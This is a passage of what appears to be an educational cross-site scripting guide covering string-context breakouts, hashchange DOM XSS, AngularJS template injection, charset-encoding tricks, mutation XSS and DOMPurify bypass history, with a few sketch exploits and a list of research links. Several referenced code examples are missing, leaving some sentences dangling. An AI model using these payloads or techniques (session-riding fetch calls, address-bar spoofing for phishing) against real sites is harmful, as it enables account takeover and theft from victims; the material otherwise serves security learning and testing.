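To illustrate, here is a contrived sketch assuming a server template with two injection points rendered into one script; the variable names and inputs are hypothetical:

```javascript
// Sketch: a server template like `var query = "INPUT1"; var lang = "INPUT2";`
// Ending INPUT1 with a lone backslash turns the closing quote into \",
// so the first string swallows it and INPUT2 lands in code context.
const input1 = "test\\";      // attacker input ending in a single backslash
const input2 = ";alert()//";  // attacker input in the second injection point
const generated = `var query = "${input1}"; var lang = "${input2}";`;

console.log(generated);
// var query = "test\"; var lang = ";alert()//";
```

Parsing the generated line, the first string is now `"test\"; var lang = "`, after which `;alert()//` executes as code and the `//` comments out the leftover quote.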

Instead, we can abuse a lesser-known feature of script contents where, for legacy reasons, <!-- and <script strings need to be balanced. When opening an HTML comment inside a script tag, any closing script tags before a closing comment tag will be ignored. Only if another, later input of ours contains --> will the script tag be allowed to close via a closing script tag again.

This can cause all sorts of problems, as shown in the example below:

Sources are where data comes from, and there are many for JavaScript. There might be a URL parameter from URLSearchParams that is put in some HTML code, location.hash for #... data after a URL, simply a fetch(), document.referrer, and even "message" listeners (postMessage()) which allow communication between origins.

A snippet like the following was very commonly exploited:

Here the location.hash source is put into the vulnerable sink, which is exploitable with a simple #<img src onerror=alert()> payload. In the snippet, this is called on the hashchange event: it is not triggered on page load, but only after the hash has changed. In order to exploit this, we need to load the page normally first, and then after some time when the page has loaded, we can replace the URL of the active window, which acts as a "change". Note that reading a location is not allowed cross-origin, but writing a new location is, so we can abuse this.

Otherwise, you can still load and change a URL by open()'ing it in a new window, waiting some time, and then changing the location of the window you held on to (note that open() requires user interaction, such as an onclick= handler, to be triggered):
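
A browser-only sketch of such an attacker page follows; "https://vuln.example/" is a hypothetical vulnerable target, and the delay is a guess at how long the page needs to load:

```javascript
// Browser-only sketch (not executed here): trigger a hashchange-based DOM XSS.
// "https://vuln.example/" is a hypothetical page with a vulnerable hashchange handler.
function exploitHashchange(target = "https://vuln.example/") {
  // open() must be called from a user interaction, e.g. an onclick= handler
  const victim = open(target, "victim");
  setTimeout(() => {
    // Writing a cross-origin window's location is allowed (reading is not);
    // only the fragment changes, so this fires "hashchange" without a reload
    victim.location = target + "#<img src onerror=alert()>";
  }, 2000);
}
```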

When this is enabled, however, many possibilities open up. One of the most interesting is template injection using {{ characters inside a text string; no HTML tags are needed here! This is a rather well-known technique though, so it may be blocked. In cases of HTML injection with strong filters, you may be able to add custom attributes that bypass filters like DOMPurify. See this presentation by Masato Kinugawa for some AngularJS tricks that managed to bypass Teams' filters.

You may still be able to exploit this by slowing down the AngularJS script loading by filling up the browser's connection pool. See this challenge writeup for details.

Note: It is not possible to abuse the JIS X 0208 1978 or JIS X 0208 1983 (2 bytes per char) encodings to write arbitrary ASCII characters instead of Unicode garbage. Only some Japanese characters and ASCII full-width alternatives can be created, except for two unique cases that can generate a $ and ( character, found using this fuzzer:

The missing charset behavior may be common in file uploads, and in Blob URLs which are created by explicitly writing a content type in JavaScript. Developers often forget the charset:

The "Cross-Site" in XSS means that it should be exploitable from another malicious site, which can then perform actions on the victim's behalf on the target site. It is always a good idea to test exploits locally first with a simple web server like php -S 0.0.0.0:8000; when you need to exploit something remotely, it can be hosted temporarily with a tool like ngrok, or permanently with a web server of your own.

Note that URL encoding might be needed on parameters to make sure special characters are not part of the URL, or simply to obfuscate the payload.

When making a fetch() request to the same domain you are on, cookies are included, even if httpOnly is set. This opens up many possibilities by requesting data and performing actions on the application. When making a request, the response is also readable because of the Same-Origin Policy, as we are on the same site the request is going to.

Performing actions on the victim's behalf is also common and can result in high impact, depending on their capabilities. These are often done using POST requests and may contain extra data or special headers. Luckily, fetch() allows us to do all that and more! Its second argument contains options with keys like method:, headers:, and body:, just to name a few:

Some of the mentioned phishing tricks can be improved with XSS by rewriting the URL shown in the address bar. This is possible with the History API, to show the user an expected /login path or similar:

The 2nd case is very hard to protect securely. First, because many tags have unexpected abilities, like the javascript: protocol in <a href=javascript:alert()>. If posting links is allowed, the filter needs to block the javascript: protocol specifically while allowing regular https:// links. There exist a ton of different tags and attributes that can execute JavaScript (see the cheat sheet), making a blocklist almost infeasible; an allowlist should be used instead. The second reason this is hard is that browsers are weird, like really weird. The HTML specification contains a lot of rules and edge cases a filter should handle. If a filter parses a specially crafted payload differently from a browser, the malicious data might go unnoticed and end up executing in the victim's browser.
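
For the allowlist approach, a battle-tested sanitizer is the realistic option. Below is a minimal browser-only sketch using DOMPurify's ALLOWED_TAGS and ALLOWED_ATTR options (real options; the tag/attribute selection and function name are just an example):

```javascript
// Browser-only sketch (not executed here): allowlist-based rich text sanitization.
// ALLOWED_TAGS / ALLOWED_ATTR are real DOMPurify config options; any tag or
// attribute not listed is stripped from the output.
function sanitizeRichText(userHtml) {
  return DOMPurify.sanitize(userHtml, {
    ALLOWED_TAGS: ["b", "i", "em", "strong", "a", "p"],
    ALLOWED_ATTR: ["href"],  // DOMPurify still blocks javascript: URLs by default
  });
}
```

Note that as the Mutation XSS section shows, even this is only safe if the sanitized output is not later placed into a context (like <title> or <svg>) that parses it differently.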

In fact, we can even go one step further and use the global name variable, which is controllable by an attacker. It is so global that it even persists between navigations. When a victim visits our site, as in an XSS scenario, we can set the name variable to any payload we like and redirect to the vulnerable page to trigger it (see this video for more info and explanation):

Let's take the following example: The sanitizer is used to filter out malicious content that could trigger JavaScript execution, which it does perfectly on the following string:

Kevin Mizu showed another interesting exploitable scenario, where your input is placed inside an <svg> tag after sanitization:

While the abovementioned tricks can get around specific situations, an outdated version of the library can cause every output to be vulnerable by completely bypassing DOMPurify in a regular context. The latest vulnerable version is 3.1.2, with the following two articles explaining in detail how the recent techniques work:

The latest vulnerable version on the 2.x branch is 2.2.3, with a complete bypass found by @TheGrandPew in December 2020. The following payload will trigger alert(origin) when sanitized and put into any regular part of the DOM:

Easy-to-follow Google Search mXSS:

Finding a custom variation of an outdated DOMPurify bypass specific to Swagger UI:

Note: for versions below 3 (2.X.X), you don't need mXSS:

More complex Universal mXSS:

Referenced links:

domxsswiki (wisec, GitHub) - big and up-to-date collection of DOM XSS sources, sinks and techniques
DOM based AngularJS sandbox escapes (PortSwigger Research) - escaping different AngularJS version sandboxes
Evading defences using VueJS script gadgets (PortSwigger Research) - detailed research into VueJS payloads and filter bypasses
Encoding Differentials: Why Charset Matters (SonarSource) - XSS tricks when a charset definition is missing from a response, abusing ISO-2022-JP
Cross-Site Scripting (XSS) Cheat Sheet - 2022 Edition (PortSwigger Web Security Academy) - filterable list of almost every imaginable piece of HTML that can trigger JavaScript
XSS-Payloads/Without-Parentheses.md (RenwaX23, GitHub) - more tricks to run arbitrary JavaScript without parentheses to bypass filters
Mutation XSS: Explained, CVE and Challenge (jorianwoltjer.com) - explanation of mXSS, CVE-2024-52595 and some advanced techniques
Exploring the DOMPurify library: Bypasses and Fixes (1/2) (mizu.re) - bypasses of versions 3.1.0-3.1.2 using node flattening (credits to @IcesFont)
Exploring the DOMPurify library: Hunting for Misconfigurations (2/2) (mizu.re) - common misconfigurations in various later versions
Releases · cure53/DOMPurify (GitHub) - changelog of DOMPurify mentioning partial bypasses on specific versions
mXSS cheatsheet - many unique element behaviors useful for bypassing filters
Dom-Explorer - test HTML parsing/sanitization with great visualization and sharing capabilities
domxss-trigger-table.html (4KB) - source code for the script used to generate and test the DOM XSS trigger table

DOMPurify bypass history:

<= 3.1.2 - Kevin Mizu & RyotaK
<= 3.1.1 - Kevin Mizu
<= 3.1.0 - IcesFont
< 2.2.4 - TheGrandPew
< 2.2.3 - TheGrandPew
< 2.2.2 - Daniel Santos
< 2.1 - Gareth Heyes
< 2.0.17 - Michał Bentkowski

Writeups:

https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers
https://gist.github.com/JorianWoltjer/33e28f871652ac9e97086148ed965b54
https://twitter.com/garethheyes/status/1723047393279586682

Fuzzing results:

https://shazzer.co.uk/vectors/66efda1eacb1e3c22aff755c
https://gist.github.com/kevin-mizu/9b24a66f9cb20df6bbc25cc68faf3d71

Figure captions (images not included):

Table of XSS payloads and DOM sinks that trigger them (yellow = Chrome but not Firefox)
Table showing the mapping from byte to character in JIS X 0201 1976
1. Input in HTML (search) and JavaScript string (lang) escaped correctly
2. Bypass using JIS X 0201 1976 escape sequence in search, ignoring backslashes and escaping with quote
In markdown, our image alt text ends up in the <img alt= attribute
Writing the JIS X 0208 1978 escape sequence obfuscates the succeeding characters
Text in markdown ends obfuscation using ASCII escape sequence, continuing the attribute
Later image tag still part of the exploited attribute, only closed after trying to open the first attribute
Adding a malicious attribute after the context confusion creates a successful XSS payload
XSS mutation points with possible special characters
Example showing the difference between the browser and DOMPurify